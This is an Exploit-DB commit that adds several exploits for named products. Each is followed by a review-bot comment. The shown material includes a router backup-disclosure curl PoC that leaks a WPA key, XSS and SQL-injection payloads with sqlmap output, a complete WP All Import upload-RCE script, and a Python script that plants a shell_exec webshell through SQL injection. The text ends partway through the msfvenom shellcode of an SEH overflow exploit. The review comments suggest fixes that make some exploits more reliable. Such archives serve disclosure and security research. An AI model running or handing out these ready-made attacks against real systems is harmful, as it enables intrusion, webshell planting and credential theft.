DB: 2023-03-30

13 changes to exploits/shellcodes/ghdb

DSL-124 Wireless N300 ADSL2+ - Backup File Disclosure
Uniview NVR301-04S2-P4 - Reflected Cross-Site Scripting (XSS)
Book Store Management System 1.0.0 - Stored Cross-Site Scripting (XSS)
Helmet Store Showroom v1.0 - SQL Injection
Human Resource Management System 1.0 - SQL Injection (unauthenticated)
Revenue Collection System v1.0 - Remote Code Execution (RCE)
WP All Import v3.6.7 - Remote Code Execution (RCE) (Authenticated)
Outline V1.6.0 - Unquoted Service Path
Inbit Messenger v4.9.0 - Unauthenticated Remote Command Execution (RCE)
Inbit Messenger v4.9.0 - Unauthenticated Remote SEH Overflow
Internet Download Manager v6.41 Build 3 - Remote Code Execution (RCE)
This commit is contained in:
Exploit-DB 2023-03-30 00:16:31 +00:00
parent 6bc7a6f9b0
commit 564d2ddf47
13 changed files with 1026 additions and 0 deletions


@ -0,0 +1,46 @@
# Exploit Title: DSL-124 Wireless N300 ADSL2+ - Backup File Disclosure
# Date: 2022-11-10
# Exploit Author: Aryan Chehreghani
# Vendor Homepage: https://www.dlink.com
# Software Link: https://dlinkmea.com/index.php/product/details?det=dU1iNFc4cWRsdUpjWEpETFlSeFlZdz09
# Firmware Version: ME_1.00
# Tested on: Windows 11
# [ Details - DSL-124 ]:
#The DSL-124 Wireless N300 ADSL2+ Modem Router is a versatile, high-performance router for a home or small office,
#With integrated ADSL2/2+, supporting download speeds up to 24 Mbps, firewall protection,
#Quality of Service (QoS),802.11n wireless LAN, and four Ethernet switch ports,
#the Wireless N300 ADSL2+ Modem Router provides all the functions that a user needs to establish a secure and high-speed link to the Internet.
# [ Description ]:
#After the administrator enters and a new session is created, the attacker sends a request using the post method in her system,
#and in response to sending this request, she receives a complete backup of the router settings,
#In fact this happens because of the lack of management of users and sessions in the network.
# [ POC ]:
Request :
curl -d "submit.htm?saveconf.htm=Back+Settings" -X POST http://192.168.1.1/form2saveConf.cgi
Response :
HTTP/1.1 200 OK
Connection: close
Server: Virtual Web 0.9
Content-Type: application/octet-stream;
Content-Disposition: attachment;filename="config.img"
Pragma: no-cache
Cache-Control: no-cache
<Config_Information_File_8671>
<V N="WLAN_WPA_PSK" V="pass@12345"/>
<V N="WLAN_WPA_PSK_FORMAT" V="0x0"/>
<V N="WLAN_WPA_REKEY_TIME" V=""/>
<V N="WLAN_ENABLE_1X" V="0x0"/>
<V N="WLAN_ENABLE_MAC_AUTH" V="0x0"/>
<V N="WLAN_RS_IP" V="0.0.0.0"/>
.
.
.
</Config_Information_File_8671>
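Review bot: the Description paragraph (the lines beginning "After the administrator enters") leaves the precondition implicit: the curl request carries no cookie or credentials, so the PoC only shows something if `form2saveConf.cgi` hands `config.img` to a second host while an administrator session exists on the device. State that plainly and note that the request was issued from a machine other than the one that logged in, otherwise a reader cannot distinguish this from an ordinary authenticated backup download. The write-up should also name the impact that is visible in the response: the backup is served unencrypted and includes the wireless pre-shared key in cleartext (`WLAN_WPA_PSK`), which is what makes this more than a settings leak. Minor: `# Tested on: Windows 11` describes the attacking host, not the target; the `# Firmware Version: ME_1.00` line already covers the device.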


@ -0,0 +1,44 @@
# Exploit Title: Uniview NVR301-04S2-P4 - Reflected Cross-Site Scripting (XSS)
# Author: Bleron Rrustemi
# Discovery Date: 2022-11-15
# Vendor Homepage: https://www.uniview.com/tr/Products/NVR/Easy/NVR301-04S2-P4/
# Datasheet:: https://www.uniview.com/download.do?id=1761643
# Device Firmware: NVR-B3801.20.15.200829
# Tested Version: NVR301-04S2-P4
# Tested on: Windows 10 Enterprise LTSC 64\Firefox 106.0.5 (64-bit)
# Vulnerability Type: Reflected Cross-Site Scripting (XSS)
# CVE: N/A
# Proof of Concept:
IP=IP of the device
http://IP/LAPI/V1.0/System/Security/Login/"><script>alert('1')</script>
Best regards,
Bleron Rrustemi
Chief Technology Officer
Direct: +383 (0) 49 955 503
E-mail: <mailto:bleron@drugeza.com> bleron@drugeza.com
<http://>
Drugëza SHPK
Rr. Lekë Dukagjini p.n
Prishtinë, 10000 • Kosovo
Tel.: +383 49 955 503
www.drugeza.com
ü Be GREEN, keep it on the SCREEN
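Review bot: everything from "Best regards," through "Be GREEN, keep it on the SCREEN" is the submitter's e-mail signature, not part of the exploit, and should be cut before the file is archived; it carries phone numbers and a postal address that have no place in a public PoC. The PoC itself needs one sentence of context: the injection point is the URL path under `/LAPI/V1.0/System/Security/Login/`, the `"><script>alert('1')</script>` segment is shown unencoded, and the entry should say where the path is reflected (which response body or error page) so a reader can tell a genuine reflection from the browser merely displaying the URL. Also drop the doubled colon in `# Datasheet::`.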

exploits/php/webapps/51122.py Executable file

@ -0,0 +1,285 @@
# Exploit Title: WP All Import v3.6.7 - Remote Code Execution (RCE) (Authenticated)
# Date: 11/05/2022
# Exploit Author: AkuCyberSec (https://github.com/AkuCyberSec)
# Vendor Homepage: https://www.wpallimport.com/
# Software Link: https://wordpress.org/plugins/wp-all-import/advanced/ (scroll down to select the version)
# Version: <= 3.6.7 (tested: 3.6.7)
# Tested on: WordPress 6.1 (os-independent since this exploit does NOT provide the payload)
# CVE: CVE-2022-1565
#!/usr/bin/python
import requests
import re
import os
# WARNING: This exploit does NOT include the payload.
# Also, be sure you already have some valid admin credentials. This exploit needs an administrator account in order to work.
# If a file with the same name as the payload is already on the server, the upload will OVERWRITE it
#
# Please notice that I'm NOT the researcher who found this vulnerability
# # # # # VULNERABILITY DESCRIPTION # # # # #
# The plugin WP All Import is vulnerable to arbitrary file uploads due to missing file type validation via the wp_all_import_get_gz.php file in versions up to, and including, 3.6.7.
# This makes it possible for authenticated attackers, with administrator level permissions and above, to upload arbitrary files on the affected sites server which may make remote code execution possible.
# # # # # HOW THE EXPLOIT WORKS # # # # #
# 1. Prepare the zip file:
# - create a PHP file with your payload (e.g. rerverse shell)
# - set the variable "payload_file_name" with the name of this file (e.g. "shell.php")
# - create a zip file with the payload
# - set the variable "zip_file_to_upload" with the PATH of this file (e.g. "/root/shell.zip")
#
# 2. Login using an administrator account:
# - set the variable "target_url" with the base URL of the target (do NOT end the string with the slash /)
# - set the variable "admin_user" with the username of an administrator account
# - set the variable "admin_pass" with the password of an administrator account
#
# 3. Get the wpnonce using the get_wpnonce_upload_file() method
# - there are actually 2 types of wpnonce:
# - the first wpnonce will be retrieved using the method retrieve_wpnonce_edit_settings() inside the PluginSetting class.
# This wpnonce allows us to change the plugin settings (check the step 4)
# - the second wpnonce will be retrieved using the method retrieve_wpnonce_upload_file() inside the PluginSetting class.
# This wpnonce allows us to upload the file
#
# 4. Check if the plugin secure mode is enabled using the method check_if_secure_mode_is_enabled() inside the PluginSetting class
# - if the Secure Mode is enabled, the zip content will be put in a folder with a random name.
# The exploit will disable the Secure Mode.
# By disabling the Secure Mode, the zip content will be put in the main folder (check the variable payload_url).
# The method called to enable and disable the Secure Mode is set_plugin_secure_mode(set_to_enabled:bool, wpnonce:str)
# - if the Secure Mode is NOT enabled, the exploit will upload the file but then it will NOT enable the Secure Mode.
#
# 5. Upload the file using the upload_file(wpnonce_upload_file: str) method
# - after the upload, the server should reply with HTTP 200 OK but it doesn't mean the upload was completed successfully.
# The response will contain a JSON that looks like this:
# {"jsonrpc":"2.0","error":{"code":102,"message":"Please verify that the file you uploading is a valid ZIP file."},"is_valid":false,"id":"id"}
# As you can see, it says that there's an error with code 102 but, according to the tests I've done, the upload is completed
#
# 6. Re-enable the Secure Mode if it was enabled using the switch_back_to_secure_mode() method
#
# 7. Activate the payload using the activate_payload() method
# - you can define a method to activate the payload.
# There reason behind this choice is that this exploit does NOT provide any payload.
# Since you can use a custom payload, you may want to activate it using an HTTP POST request instead of a HTTP GET request, or you may want to pass parameters
# # # # # WHY DOES THE EXPLOIT DISABLE THE SECURE MODE? # # # # #
# According to the PoC of this vulnerability provided by WPSCAN, we should be able to retrieve the uploaded files by visiting the "MAnaged Imports page"
# I don't know why but, after the upload of any file, I couldn't see the uploaded file in that page (maybe the Pro version is required?)
# I had to find a workaround and so I did, by exploiting this option.
# WPSCAN Page: https://wpscan.com/vulnerability/578093db-a025-4148-8c4b-ec2df31743f7
# # # # # ANY PROBLEM WITH THE EXPLOIT? # # # # #
# In order for the exploit to work please consider the following:
# 1. check the target_url and the admin credentials
# 2. check the path of the zip file and the name of the payload (they can be different)
# 3. if you're testing locally, try to set verify_ssl_certificate on False
# 4. you can use print_response(http_response) to investigate further
# Configure the following variables:
target_url = "https://vulnerable.wp/wordpress" # Target base URL
admin_user = "admin" # Administrator username
admin_pass = "password" # Administrator password
zip_file_to_upload = "/shell.zip" # Path to the ZIP file (e.g /root/shell.zip)
payload_file_name = "shell.php" # Filename inside the zip file (e.g. shell.php). This file will be your payload (e.g. reverse shell)
verify_ssl_certificate = True # If True, the script will exit if the SSL Certificate is NOT valid. You can set it on False while testing locally, if needed.
# Do NOT change the following variables
wp_login_url = target_url + "/wp-login.php" # WordPress login page
wp_all_import_page_settings = target_url + "/wp-admin/admin.php?page=pmxi-admin-settings" # Plugin page settings
payload_url = target_url + "/wp-content/uploads/wpallimport/uploads/" + payload_file_name # Payload will be uploaded here
re_enable_secure_mode = False
session = requests.Session()
# This class helps to retrieve plugin settings, including the nonce(s) used to change settings and upload files.
class PluginSetting:
# Regular Expression patterns
pattern_setting_secure_mode = r'<input[a-zA-Z0-9="_\- ]*id="secure"[a-zA-Z0-9="_\-/ ]*>'
pattern_wpnonce_edit_settings = r'<input[a-zA-Z0-9="_\- ]*id="_wpnonce_edit\-settings"[a-zA-Z0-9="_\- ]*value="([a-zA-Z0-9]+)"[a-zA-Z0-9="_\-/ ]*>'
pattern_wpnonce_upload_file = r'wp_all_import_security[ ]+=[ ]+["\']{1}([a-zA-Z0-9]+)["\']{1};'
http_response: requests.Response
is_secure_mode_enabled: bool
wpnonce_edit_settings: str
wpnonce_upload_file: str
def __init__(self, http_response: requests.Response):
self.http_response = http_response
self.check_if_secure_mode_is_enabled()
self.retrieve_wpnonce_edit_settings()
self.retrieve_wpnonce_upload_file()
def check_if_secure_mode_is_enabled(self):
# To tell if the Secure Mode is enabled you can check if the checkbox with id "secure" is checked
# <input type="checkbox" value="1" id="secure" name="secure" checked="checked">
regex_search = re.search(self.pattern_setting_secure_mode, self.http_response.text)
if not regex_search:
print("Something went wrong: could not retrieve plugin settings. Are you an administrator?")
# print_response(self.http_response) # for debugging
exit()
self.is_secure_mode_enabled = "checked" in regex_search.group()
def retrieve_wpnonce_edit_settings(self):
# You can find this wpnonce in the source file by searching for the following input hidden:
# <input type="hidden" id="_wpnonce_edit-settings" name="_wpnonce_edit-settings" value="052e2438f9">
# 052e2438f9 would be the wpnonce for editing the settings
regex_search = re.search(self.pattern_wpnonce_edit_settings, self.http_response.text)
if not regex_search:
print("Something went wrong: could not retrieve _wpnonce_edit-settings parameter. Are you an administrator?")
# print_response(self.http_response) # for debugging
exit()
self.wpnonce_edit_settings = regex_search.group(1)
def retrieve_wpnonce_upload_file(self):
# You can find this wpnonce in the source file by searching for the following javascript variable: var wp_all_import_security = 'dee75fdb8b';
# dee75fdb8b would be the wpnonce for the upload
regex_search = re.search(self.pattern_wpnonce_upload_file, self.http_response.text)
if not regex_search:
print("Something went wrong: could not retrieve the upload wpnonce from wp_all_import_security variable")
# print_response(self.http_response) # for debugging
exit()
self.wpnonce_upload_file = regex_search.group(1)
def wp_login():
global session
data = { "log" : admin_user, "pwd" : admin_pass, "wp-submit" : "Log in", "redirect_to" : wp_all_import_page_settings, "testcookie" : 1 }
login_cookie = { "wordpress_test_cookie" : "WP Cookie check" }
# allow_redirects is set to False because, when credentials are correct, wordpress replies with 302 found.
# Looking for this HTTP Response Code makes it easier to tell whether the credentials were correct or not
print("Trying to login...")
response = session.post(url=wp_login_url, data=data, cookies=login_cookie, allow_redirects=False, verify=verify_ssl_certificate)
if response.status_code == 302:
print("Logged in successfully!")
return
# print_response(response) # for debugging
print("Login failed. If the credentials are correct, try to print the response to investigate further.")
exit()
def set_plugin_secure_mode(set_to_enabled:bool, wpnonce:str) -> requests.Response:
global session
if set_to_enabled:
print("Enabling secure mode...")
else:
print("Disabling secure mode...")
print("Edit settings wpnonce value: " + wpnonce)
data = { "secure" : (1 if set_to_enabled else 0), "_wpnonce_edit-settings" : wpnonce, "_wp_http_referer" : wp_all_import_page_settings, "is_settings_submitted" : 1 }
response = session.post(url=wp_all_import_page_settings, data=data, verify=verify_ssl_certificate)
if response.status_code == 403:
print("Something went wrong: HTTP Status code is 403 (Forbidden). Wrong wpnonce?")
# print_response(response) # for debugging
exit()
return response
def switch_back_to_secure_mode():
global session
print("Re-enabling secure mode...")
response = session.get(url=wp_all_import_page_settings)
plugin_setting = PluginSetting(response)
if plugin_setting.is_secure_mode_enabled:
print("Secure mode is already enabled")
return
response = set_plugin_secure_mode(set_to_enabled=True,wpnonce=plugin_setting.wpnonce_edit_settings)
new_plugin_setting = PluginSetting(response)
if not new_plugin_setting.is_secure_mode_enabled:
print("Something went wrong: secure mode has not been re-enabled")
# print_response(response) # for debugging
exit()
print("Secure mode has been re-enabled!")
def get_wpnonce_upload_file() -> str:
global session, re_enable_secure_mode
# If Secure Mode is enabled, the exploit tries to disable it, then returns the wpnonce for the upload
# If Secure Mode is already disabled, it just returns the wpnonce for the upload
print("Checking if secure mode is enabled...")
response = session.get(url=wp_all_import_page_settings)
plugin_setting = PluginSetting(response)
if not plugin_setting.is_secure_mode_enabled:
re_enable_secure_mode = False
print("Insecure mode is already enabled!")
return plugin_setting.wpnonce_upload_file
print("Secure mode is enabled. The script will disable secure mode for the upload, then it will be re-enabled.")
response = set_plugin_secure_mode(set_to_enabled=False, wpnonce=plugin_setting.wpnonce_edit_settings)
new_plugin_setting = PluginSetting(response)
if new_plugin_setting.is_secure_mode_enabled:
print("Something went wrong: secure mode has not been disabled")
# print_response(response) # for debugging
exit()
print("Secure mode has been disabled!")
re_enable_secure_mode = True
return new_plugin_setting.wpnonce_upload_file
def upload_file(wpnonce_upload_file: str):
global session
print("Uploading file...")
print("Upload wpnonce value: " + wpnonce_upload_file)
zip_file_name = os.path.basename(zip_file_to_upload)
upload_url = wp_all_import_page_settings + "&action=upload&_wpnonce=" + wpnonce_upload_file
files = { "async-upload" : (zip_file_name, open(zip_file_to_upload, 'rb'))}
data = { "name" : zip_file_name }
response = session.post(url=upload_url, files=files, data=data)
if response.status_code == 200:
print("Server replied with HTTP 200 OK. The upload should be completed.")
print("Payload should be here: " + payload_url)
print("If you can't find the payload at this URL, try to print the response to investigate further")
# print_response(response) # for debugging
return 1
else:
print("Something went wrong during the upload. Try to print the response to investigate further")
# print_response(response) # for debugging
return 0
def activate_payload():
global session
print("Activating payload...")
response = session.get(url=payload_url)
if response.status_code != 200:
print("Something went wrong: could not find payload at " + payload_url)
# print_response(response) # for debugging
return
def print_response(response:requests.Response):
print(response.status_code)
print(response.text)
# Entry Point
def Main():
print("Target: " + target_url)
print("Credentials: " + admin_user + ":" + admin_pass)
# Do the login
wp_login()
# Retrieve wpnonce for upload.
# It disables Secure Mode if needed, then returns the wpnonce
wpnonce_upload_file = get_wpnonce_upload_file()
# Upload the file
file_uploaded = upload_file(wpnonce_upload_file)
# Re-enable Secure Mode if needed
if re_enable_secure_mode:
switch_back_to_secure_mode()
# Activate the payload
if file_uploaded:
activate_payload()
Main()
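Review bot: `verify_ssl_certificate` is passed to the requests in `wp_login()` and `set_plugin_secure_mode()` but not to the `session.get`/`session.post` calls in `switch_back_to_secure_mode()`, `get_wpnonce_upload_file()`, `upload_file()` and `activate_payload()`, so setting it to `False` for a self-signed local target (as the "ANY PROBLEM WITH THE EXPLOIT?" section advises) still fails at the first of those calls with a certificate error; either pass `verify=verify_ssl_certificate` on every call or set `session.verify = verify_ssl_certificate` once right after `session = requests.Session()`. Two smaller points: the `#!/usr/bin/python` line sits below the comment header rather than on line 1, so the executable bit does nothing, and the `open(zip_file_to_upload, 'rb')` handle in `upload_file()` is never closed (wrap it in `with`). The note about error code 102 is worth keeping; it explains why a 200 with `"is_valid":false` is not a failed upload.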


@ -0,0 +1,18 @@
# Exploit Title: Book Store Management System 1.0.0 - Stored Cross-Site Scripting (XSS)
# Date: 2022-11-08
# Exploit Author: Rajeshwar Singh
# Vendor Homepage: https://www.sourcecodester.com/
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/bsms_ci.zip
# Tested on: Windows/XAMPP
###########################################################################
Payload use = "><script>alert("XSS")</script>
1. Visit URL http://localhost/bsms_ci/
2. login with admin Credentials
3. navigate to user Management
4. Click on "Add New System User"
5. Add payload in "Name" input field
6. Click save.
7. Visit http://localhost/bsms_ci/index.php/user
8. XSS payload execute.
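Review bot: the steps never say who the victim is or what privilege the attacker needs. Step 2 logs in as admin and the payload is planted through "Add New System User", so this is stored XSS injected by a user with access to User Management via the `Name` field, firing for anyone who later opens `/index.php/user`; one description line stating that (and that administrator access is required to plant it) would make the risk clear. Also add a `# Version:` header (the title says 1.0.0) so the entry matches the other submissions in this commit.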


@ -0,0 +1,120 @@
# Exploit Title: Human Resource Management System - SQL Injection (unauthenticated)
# Date: 08-11-2022
# Exploit Author: Matthijs van der Vaart (eMVee)
# Vendor Homepage: https://www.sourcecodester.com/php/15740/human-resource-management-system-project-php-and-mysql-free-source-code.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/hrm.zip
# Version: 1.0 (Monday, October 10, 2022 - 13:37)
# Tested On: Windows 10 Pro 10.0.19044 N/A Build 1288 + XAMPP V3.3.0
1) Capture the login POST request with Burp Suite or OWASP ZAP
2) Save the request as "login.req"
3) Run sqlmap as follows: "sqlmap -r login.req"
Example login.req
==========
POST /controller/login.php HTTP/1.1
Host: target
Cookie: csrf_token_f58f5b43e3803b8c3c224afd706cf0f9927d9fd3c222740171d746d078b1ac9b=h1qG45IggxzwQ/i1lH2zBF7ktvDJT716RNl59LQTkwk=; PHPSESSID=kg0h3kpsbf2r3mnmbmmap2afda
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 66
Origin: https://target
Referer: https://target/index.php<https://10.0.2.15/dashboard/hrm/index.php>
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close
name=admin%40gmail.com&password=password+&submit=Sign+In
=========
Output example SQL Injection unauthenticated login page
==========
POST parameter 'password' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n
sqlmap identified the following injection point(s) with a total of 1143 HTTP(s) requests:
---
Parameter: password (POST)
Type: boolean-based blind
Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: name=admin@gmail.com&password=password ' RLIKE (SELECT (CASE WHEN (7213=7213) THEN 0x70617373776f726420 ELSE 0x28 END))-- ylOf&submit=Sign In
Type: error-based
Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: name=admin@gmail.com&password=password ' OR (SELECT 8513 FROM(SELECT COUNT(*),CONCAT(0x7176787871,(SELECT (ELT(8513=8513,1))),0x716a7a6271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- RBnO&submit=Sign In
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: name=admin@gmail.com&password=password ' AND (SELECT 4404 FROM (SELECT(SLEEP(5)))eQTb)-- NTCP&submit=Sign In
Parameter: name (POST)
Type: boolean-based blind
Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: name=admin@gmail.com' RLIKE (SELECT (CASE WHEN (2620=2620) THEN 0x61646d696e40676d61696c2e636f6d ELSE 0x28 END))-- KlrV&password=password &submit=Sign In
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: name=admin@gmail.com' AND (SELECT 7287 FROM(SELECT COUNT(*),CONCAT(0x7176787871,(SELECT (ELT(7287=7287,1))),0x716a7a6271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- fSRz&password=password &submit=Sign In
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: name=admin@gmail.com' AND (SELECT 8912 FROM (SELECT(SLEEP(5)))NCtJ)-- ennA&password=password &submit=Sign In
---
there were multiple injection points, please select the one to use for following injections:
[0] place: POST, parameter: name, type: Single quoted string (default)
[1] place: POST, parameter: password, type: Single quoted string
==========
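Review bot: the `Referer:` line in the sample `login.req` carries mail-client autolink residue (`<https://10.0.2.15/dashboard/hrm/index.php>` appended to the URL), and `Origin`/`Referer` use `https://target` while `Host` is bare `target`; strip the residue before the file is saved as the request that `sqlmap -r login.req` replays. `Content-Length: 66` also does not match the 56-byte body shown (`name=admin%40gmail.com&password=password+&submit=Sign+In`); sqlmap recomputes it, but anyone replaying by hand will not. The sqlmap output itself supports the title: both `name` and `password` of `/controller/login.php` are injectable with no session, so "unauthenticated" is justified.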


@ -0,0 +1,34 @@
# Exploit Title: Helmet Store Showroom v1.0 - SQL Injection
# Exploit Author: Ameer Hamza
# Date: November 15, 2022
# Vendor Homepage: https://www.sourcecodester.com/php/15851/helmet-store-showroom-site-php-and-mysql-free-source-code.html
# Software Link: https://www.sourcecodester.com/download-code?nid=15851&title=Helmet+Store+Showroom+Site+in+PHP+and+MySQL+Free+Source+Code
# Tested on: Kali Linux, Apache, Mysql
# Vendor: oretnom23
# Version: v1.0
# Exploit Description:
# Helmet Store Showroom v1.0 suffers from SQL injection on the login page which leads to authentication bypass of the admin account.
[+] The username parameter is vulnerable to SQLi in login page
[+] URL --> http://localhost/hss/admin/login.php
[+] Username = ' OR 1=1-- -
HTTP REQUEST
POST /hss/classes/Login.php?f=login HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 38
Origin: http://localhost
Connection: close
Referer: http://localhost/hss/admin/login.php
Cookie: PHPSESSID=08o3sl7jk4l442gq19s1t3hvpa
username='+OR+1%3D1+--+-&password=1234
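Review bot: the write-up points at `/hss/admin/login.php` as the vulnerable URL, but the request shows the injection going to `/hss/classes/Login.php?f=login`, the XHR endpoint behind the form; name that endpoint and the `username` parameter in the description so a patch or a scanner is aimed at the right file. `' OR 1=1-- -` only bypasses authentication if the first row returned is the admin account, so also record what the response was (redirect, JSON status) to show that the bypass landed on an admin session rather than merely not erroring.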

exploits/php/webapps/51133.py Executable file

@ -0,0 +1,43 @@
# Exploit Title: Revenue Collection System v1.0 - Remote Code Execution (RCE)
# Exploit Author: Joe Pollock
# Date: November 16, 2022
# Vendor Homepage: https://www.sourcecodester.com/php/14904/rates-system.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/rates.zip
# Tested on: Kali Linux, Apache, Mysql
# Vendor: Kapiya
# Version: 1.0
# Exploit Description:
# Revenue Collection System v1.0 suffers from an unauthenticated SQL Injection Vulnerability, in step1.php, allowing remote attackers to
# write a malicious PHP file to disk. The resulting file can then be accessed within the /rates/admin/DBbackup directory.
# This script will write the malicious PHP file to disk, issue a user-defined command, then retrieve the result of that command.
# Ex: python3 rcsv1.py 10.10.14.2 "ls"
import sys, requests
def main():
if len(sys.argv) != 3:
print("(+) usage: %s <target> <cmd>" % sys.argv[0])
print('(+) eg: %s 192.168.121.103 "ls"' % sys.argv[0])
sys.exit(-1)
targetIP = sys.argv[1]
cmd = sys.argv[2]
s = requests.Session()
# Define obscure filename and command parameter to limit exposure and usage of the RCE.
FILENAME = "youcantfindme.php"
CMDVAR = "ohno"
# Define the SQL injection string
sqli = """'+UNION+SELECT+"<?php+echo+shell_exec($_GET['%s']);?>","","","","","","","","","","","","","","","",""+INTO+OUTFILE+'/var/www/html/rates/admin/DBbackup/%s'--+-""" % (CMDVAR,FILENAME)
# Write the PHP file to disk using the SQL injection vulnerability
url1 = "http://%s/rates/index.php?page=step1&proId=%s" % (targetIP,sqli)
r1 = s.get(url1)
# Execute the user defined command and display the result
url2 = "http://%s/rates/admin/DBbackup/%s?%s=%s" % (targetIP,FILENAME,CMDVAR,cmd)
r2 = s.get(url2)
print(r2.text)
if __name__ == '__main__':
main()
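Review bot: the `INTO OUTFILE` write on the `sqli` line depends on conditions the script neither checks nor documents: the MySQL account needs the `FILE` privilege, `secure_file_priv` must be empty or cover the web root, and `/var/www/html/rates/admin/DBbackup/` must be the real DocumentRoot path. `r1` is never inspected and `r2.text` is printed unconditionally, so when any of those fails the only output is a 404 page. Check `r2.status_code` (or look for the command output) before printing, and make the OUTFILE path a parameter. Also note that the written webshell is permanent and that `SELECT ... INTO OUTFILE` refuses to overwrite an existing file, so a second run of the script succeeds only because the first file is still there; the usage example `rcsv1.py` should match the archived filename.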


@ -0,0 +1,35 @@
# Exploit Title: Outline V1.6.0 - Unquoted Service Path
# Exploit Author: Milad Karimi (Ex3ptionaL)
# Discovery Date: 2022-11-10
# Vendor Homepage: https://getoutline.org/
# Software Link: https://getoutline.org/
# Tested Version: V1.6.0
# Vulnerability Type: Unquoted Service Path
# Tested on OS: Microsoft Windows 11 Enterprise
# Step to discover Unquoted Service Path:
C:\>wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """
Outline Updater OutlineServiceSvc C:\Program Files (x86)\Outline\OutlineService.exe
                      Auto
C:\>sc qc OutlineService
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: OutlineService
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Program Files (x86)\Outline\OutlineService.exe
        
LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : OutlineService
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem
C:\>systeminfo
OS Name:  Microsoft Windows 11 Enterprise
OS Version: 10.0.22000 N/A Build 22000
OS Manufacturer: Microsoft Corporation
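Review bot: the `wmic` row and the `sc qc` output do not describe the same service: the first lists display name `Outline Updater` with service name `OutlineServiceSvc`, the second queries `OutlineService` and reports `DISPLAY_NAME : OutlineService`; use the name of the service that actually has the unquoted `BINARY_PATH_NAME` consistently. More importantly, an unquoted path is exploitable only if a low-privileged user can write to a directory along it (`C:\` or `C:\Program Files (x86)\` here) so that `C:\Program.exe` or `C:\Program Files (x86)\Outline.exe` runs as `LocalSystem` (per `SERVICE_START_NAME`); the submission shows no `icacls` output for those directories, and default ACLs do not grant that, so the entry should include that check or be described as a finding rather than a working privilege escalation.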

exploits/windows/remote/51126.py Executable file

@ -0,0 +1,121 @@
# Exploit Title: Inbit Messenger v4.9.0 - Unauthenticated Remote SEH Overflow
# Date: 11/08/2022
# Exploit Author: a-rey
# Vendor Homepage: http://www.inbit.com/support.html
# Software Link: http://www.softsea.com/review/Inbit-Messenger-Basic-Edition.html
# Version: v4.6.0 - v4.9.0
# Tested on: Windows XP SP3, Windows 7, Windows 10
# Exploit Write-Up: https://github.com/a-rey/exploits/blob/main/writeups/Inbit_Messenger/v4.6.0/writeup.md
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import sys, socket, struct, argparse, logging
"""
/opt/metasploit-framework/bin/msfvenom \
-p windows/messagebox \
ICON=WARNING \
TEXT="get wrecked" \
TITLE="LOLZ" \
EXITFUNC=thread \
-f py \
-v SHELLCODE \
-e x86/shikata_ga_nai \
-b '\x3E'
"""
SHELLCODE = b""
SHELLCODE += b"\xba\xbd\x3d\x03\xfa\xd9\xc9\xd9\x74\x24\xf4"
SHELLCODE += b"\x5b\x31\xc9\xb1\x41\x31\x53\x14\x03\x53\x14"
SHELLCODE += b"\x83\xc3\x04\x5f\xc8\xda\x11\x04\xea\xa9\xc1"
SHELLCODE += b"\xce\x3c\x80\xb8\x59\x0e\xed\xd9\x2e\x01\xdd"
SHELLCODE += b"\xaa\x46\xee\x96\xdb\xba\x65\xee\x2b\x49\x07"
SHELLCODE += b"\xcf\xa0\x7b\xc0\x40\xaf\xf6\xc3\x06\xce\x29"
SHELLCODE += b"\xdc\x58\xb0\x42\x4f\xbf\x15\xdf\xd5\x83\xde"
SHELLCODE += b"\x8b\xfd\x83\xe1\xd9\x75\x39\xfa\x96\xd0\x9e"
SHELLCODE += b"\xfb\x43\x07\xea\xb2\x18\xfc\x98\x44\xf0\xcc"
SHELLCODE += b"\x61\x77\xcc\xd3\x32\xfc\x0c\x5f\x4c\x3c\x43"
SHELLCODE += b"\xad\x53\x79\xb0\x5a\x68\xf9\x62\x8b\xfa\xe0"
SHELLCODE += b"\xe1\x91\x20\xe2\x1e\x43\xa2\xe8\xab\x07\xee"
SHELLCODE += b"\xec\x2a\xf3\x84\x09\xa7\x02\x73\x98\xf3\x20"
SHELLCODE += b"\x9f\xfa\x38\x9a\x97\xd5\x6a\x52\x42\xac\x50"
SHELLCODE += b"\x0d\x03\xe1\x5a\x22\x49\x16\xfd\x45\x91\x19"
SHELLCODE += b"\x88\xff\x6a\x5d\x65\x31\x92\xc1\xfe\xd2\x77"
SHELLCODE += b"\x50\xe8\x65\x88\xab\x17\xf0\x32\x5c\x8f\x6f"
